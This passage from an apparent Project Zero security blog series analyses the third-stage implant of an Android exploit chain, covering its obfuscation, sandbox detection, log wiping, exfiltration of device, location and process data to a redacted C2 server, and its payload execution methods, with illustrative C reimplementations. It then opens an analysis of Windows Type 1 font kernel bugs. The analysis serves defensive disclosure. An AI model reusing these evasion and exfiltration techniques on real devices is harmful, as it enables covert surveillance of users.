The binary will then iterate through the process's open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them to /dev/null. This prevents output messages from appearing, which might lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link, and any that don't include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread then calls the function that implements the bulk of the binary's behavior: it decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and execute it. This can be considered the main control loop for stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a string obfuscation technique similar to stage 2's. The binary encrypts its static configuration settings, its communications with the C2, and a hash table that stores dynamic configuration settings with AES. Instead of using descriptive strings as the hash table “keys”, it uses series of 16 AES-decrypted bytes that are passed to the hashing function. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand its behavior through dynamic analysis: for example, it monitors what is mapped into the process's memory and what file descriptors it has opened, and it sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.
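As an illustration, here is a minimal sketch of this kind of in-place decryption using OpenSSL’s EVP API. AES-256 in CBC mode is an assumption (the analysis only establishes AES256 with a hardcoded key and IV), and the key/IV arguments stand in for the values hardcoded in the binary:

#include <openssl/evp.h>
#include <stdlib.h>
#include <string.h>

static int decrypt_data_block(unsigned char *block, int len,
                              const unsigned char *key,  /* 32 bytes */
                              const unsigned char *iv) { /* 16 bytes */
  EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
  unsigned char *plain = malloc(len + EVP_MAX_BLOCK_LENGTH);
  int outl = 0, finl = 0, ok = 0;

  if (ctx && plain &&
      EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv) == 1 &&
      EVP_DecryptUpdate(ctx, plain, &outl, block, len) == 1 &&
      EVP_DecryptFinal_ex(ctx, plain + outl, &finl) == 1) {
    memcpy(block, plain, outl + finl);  /* write back over the ciphertext */
    ok = 1;
  }

  EVP_CIPHER_CTX_free(ctx);
  free(plain);
  return ok;
}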

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%
00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-
00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#
00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.
00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....
00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\
00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.
00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.
00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w
00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....
000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A
000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu
000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#
000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....
000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........
000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.
00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]
00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a
00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..
00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as status and configuration. The code initializes a CRC table which is used in the hashing algorithm, and then the hash table is initialized. The structure that manages the hashtable is shown below:

struct hashtable_mgr {
    int * hashtable_ptr;
    int maxEntries;
    int numEntries;
}

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: a pointer to the hashtable manager, a pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Throughout the rest of this post, values stored in the hash table are referred to by the key’s offset: “the value for offset 0x20 in the hash table” means the value stored under the 0x10-byte key that begins at the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {
    BYTE * key_ptr;
    uint key_len;
    uint in_use;
    BYTE * value_ptr;
    uint value_len;
};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of, for example the filename to save stage 4 to and the install and failure counts.
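To make the lookup flow concrete, here is a hypothetical sketch of getValueFromHashtable built on the two structures above (reading uint as unsigned int). The CRC-based hash and the linear probing are assumptions; the analysis only establishes that a CRC table feeds the hashing function and that keys are 0x10-byte blobs:

#include <string.h>

typedef unsigned char BYTE;

/* crc32_hash stands in for the binary's CRC-table-based hash function. */
extern unsigned int crc32_hash(const BYTE *data, unsigned int len);

static int getValueFromHashtable(struct hashtable_mgr *mgr, const BYTE *key,
                                 BYTE **value, unsigned int *value_len) {
  unsigned int idx = crc32_hash(key, 0x10) % (unsigned int)mgr->maxEntries;
  for (int probes = 0; probes < mgr->maxEntries; probes++) {
    struct hashtable_entry *entry =
        (struct hashtable_entry *)mgr->hashtable_ptr + idx;
    if (entry->in_use && entry->key_len == 0x10 &&
        memcmp(entry->key_ptr, key, 0x10) == 0) {
      *value = entry->value_ptr;       /* caller receives the stored value */
      *value_len = entry->value_len;
      return 0;
    }
    idx = (idx + 1) % (unsigned int)mgr->maxEntries; /* assumed probing */
  }
  return -1; /* key not present */
}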

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
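A sketch of that encoding, which is symmetric, so applying it a second time recovers the original entry:

#include <stdint.h>

/* Each 32-bit entry in state.parcel is XOR'd with the constant before being
 * written to disk; XOR'ing again on read recovers the timestamp. */
static uint32_t xor_parcel_entry(uint32_t entry) {
  return entry ^ 0xFF12EE34;
}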

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
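Here is a sketch of the resulting file layout, assuming zlib’s crc32 as the checksum variant (the AES step itself would mirror the decryption described earlier, run in the encrypt direction); the byte order of the stored CRC is also an assumption:

#include <stdint.h>
#include <stdio.h>
#include <zlib.h>

/* Writes uierrors.txt as described above: the 0x10 random IV bytes, then the
 * AES-256 encrypted hash table contents, then the CRC32 of the encrypted
 * bytes as the trailing 4 bytes. */
static int write_uierrors(const char *path, const unsigned char iv[16],
                          const unsigned char *encrypted, size_t enc_len) {
  FILE *f = fopen(path, "wb");
  if (!f)
    return -1;
  uint32_t crc = (uint32_t)crc32(0L, encrypted, (uInt)enc_len);
  fwrite(iv, 1, 16, f);
  fwrite(encrypted, 1, enc_len, f);
  fwrite(&crc, 1, 4, f);
  fclose(f);
  return 0;
}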

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

  • abc: Address of the decrypted data block
  • def: Address of the function that sends logging messages to the C2 server
  • def2: Address of the function that adds logging messages to the error and/or informational logging message queues
  • ghi: Points to the decrypted block of hashtable keys
  • ddd: Address of the function that performs inflate (decompress)
  • ccc: Address of the function that performs deflate (compress)
  • 0x10 bytes at 0x228CC: ???
  • 0x10 bytes at 0x228DC: Pointer to the string representation of the hex_d_uuid
  • 0x10 bytes at 0x228F0: Pointer to the C2 domain URL
  • 0x10 bytes at 0x22904: Pointer to the port string for the C2 server
  • 0x10 bytes at 0x22918: Pointer to the beginning of the certificate
  • 0x10 bytes at 0x2292C: 0x1000
  • 0x10 bytes at 0x22940: Pointer to +4AA in the decrypted data block
  • 0x10 bytes at 0x22954: 0x14
  • 0x10 bytes at 0x22698: Pointer to the user-agent string
  • PPR: SELinux status such as “selinux-init-read-fail” or “selinux-no-mdm”
  • PPMM: Set if there is no “persist.security.mdm.policy” string in /init
  • PPQQ: Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server, either when stage 3 automatically reaches out to the C2 server or “on-demand” by calling the subroutine saved as environment variable “def”. The subroutine saved as environment variable “def2” adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent about cleaning up its tracks, both while it’s running and once it finishes. While it’s running, the binary forks a new process that is responsible for cleaning up logs while the main code executes. This process does the following to cover stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0), which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
      • /data/tombstones
      • /data/misc/audit
      • /data/system/dropbox
      • /data/anr
      • /data/log
  • Unlink the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname, expecting getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will try up to 3 different random hostnames and bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames, so the code is trying to detect this type of malware analysis environment.
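A sketch of that check as described; note that EAI_NODATA is the constant the binary checks for, while on many desktop libcs a nonexistent name surfaces as EAI_NONAME instead:

#define _GNU_SOURCE /* for EAI_NODATA on glibc */
#include <netdb.h>
#include <stdlib.h>

static int dns_sandbox_check(void) {
  for (int attempt = 0; attempt < 3; attempt++) {
    char host[17];
    int len = 8 + rand() % 9;            /* 8-16 lowercase characters */
    for (int i = 0; i < len; i++)
      host[i] = 'a' + rand() % 26;
    host[len] = '\0';

    struct addrinfo *res = NULL;
    int rc = getaddrinfo(host, NULL, NULL, &res);
    if (res)
      freeaddrinfo(res);
    if (rc == EAI_NODATA)                /* expected: host does not resolve */
      return 1;                          /* resolver looks genuine */
  }
  return 0;                              /* possible analysis sandbox */
}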

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is read from the decrypted data block at offset 0x14C7; in this binary it is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket, send a Type A query for the randomly generated host name, and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”. If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods to collect this data, most commonly by reading system properties. It has two different ways to read system properties (the first is sketched after the list):

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen
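A sketch of the first method; the 32-bit libc path is taken from the text above, and the buffer size follows bionic’s PROP_VALUE_MAX of 92 bytes:

#include <dlfcn.h>

/* Resolve __system_property_get at runtime via dlopen/dlsym rather than
 * linking against it directly. Returns the value length, or -1 on error. */
typedef int (*sys_prop_get_t)(const char *name, char *value);

static int read_property(const char *name, char *value /* >= 92 bytes */) {
  void *libc = dlopen("/system/lib/libc.so", RTLD_NOW);
  if (!libc)
    return -1;
  sys_prop_get_t get = (sys_prop_get_t)dlsym(libc, "__system_property_get");
  int len = get ? get(name, value) : -1;
  dlclose(libc);
  return len;
}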

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the transaction code for the function: the code is the position at which the function is listed in the service’s AIDL file, which means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK versions 8-20, 5 for SDK version 21, and 7 for SDK versions 22-29.
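For example, a sketch of how the binary could retrieve the subscriber ID on SDK versions 22-29 using the hardcoded transaction code mentioned above, executed through popen the same way it runs getprop:

#include <stdio.h>

/* Query the iphonesubinfo service with transaction code 7 (getSubscriberId
 * on SDK 22-29). The output is a raw parcel dump that the caller must parse
 * to extract the embedded UTF-16 payload. */
static void dump_subscriber_id(void) {
  FILE *p = popen("service call iphonesubinfo 7", "r");
  if (!p)
    return;
  char line[256];
  while (fgets(line, sizeof(line), p))
    fputs(line, stdout);
  pclose(p);
}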

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Handling & Logging section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they document a condition that is less severe than an error. These are distinctions that the developers included in their code.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by adding the “identification code” to the CRC32 of the 0x10 bytes at offset 0x1CD8 in the decrypted data block.

struct compressedMessage {
    uint compressedDataLength;
    uint uncompressedDataLength;
    uint messageCode;
    BYTE * dataPointer;
    BYTE[4096] data;
};
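A sketch of that calculation; using zlib’s crc32 is an assumption about the exact CRC variant the binary implements:

#include <stdint.h>
#include <zlib.h>

/* messageCode = identification code + CRC32 of the 0x10 bytes at offset
 * 0x1CD8 in the decrypted data block. */
static uint32_t message_code(const unsigned char *decrypted_block,
                             uint32_t identification_code) {
  uint32_t base = (uint32_t)crc32(0L, decrypted_block + 0x1CD8, 0x10);
  return base + identification_code;
}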

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3
Host: REDACTED:443
Connection: keep-alive
Content-Type:application/octet-stream
Content-Length:%u
Cookie: %s

The “Cookie” field holds two values read from the decrypted data block: sid and uid. The values for both keys are base64 encoded.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP response code is not 200, it’s considered an error. The received data is first decrypted using AES256; the key is read from the decrypted data block at offset 0x48A, and the IV is the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.
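A sketch of the post-decryption processing, under the assumption that “inflate” here means a zlib-wrapped stream:

#include <stdint.h>
#include <string.h>
#include <zlib.h>

/* Byte-swap each 32-bit word in place, then decompress. uncompress()
 * expects a zlib wrapper; raw deflate would require inflateInit2 instead. */
static int bswap_and_inflate(unsigned char *buf, size_t len,
                             unsigned char *out, uLongf *out_len) {
  for (size_t i = 0; i + 4 <= len; i += 4) {
    uint32_t word;
    memcpy(&word, buf + i, sizeof(word));
    word = __builtin_bswap32(word);      /* bswap32 */
    memcpy(buf + i, &word, sizeof(word));
  }
  return uncompress(out, out_len, buf, (uLong)len) == Z_OK ? 0 : -1;
}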

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system, a shared library ELF file executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer either to the file path provided in the third argument or to a newly generated file path. If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache; in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in as the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@framework@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath; if it doesn’t exist, delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@framework@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploits for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[2];
  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }

  for (int i = 0; i < 2; i++) {
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }

    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }

  return 0;
}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0 and 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...
RSP + 0x30    ptrs[0]
RSP + 0x38    ptrs[1]
RSP + 0x40    saved RDI
RSP + 0x48    return address
RSP + 0x50    values[0 .. 1]
RSP + 0x58    saved RBX
RSP + 0x60    saved RSI
...

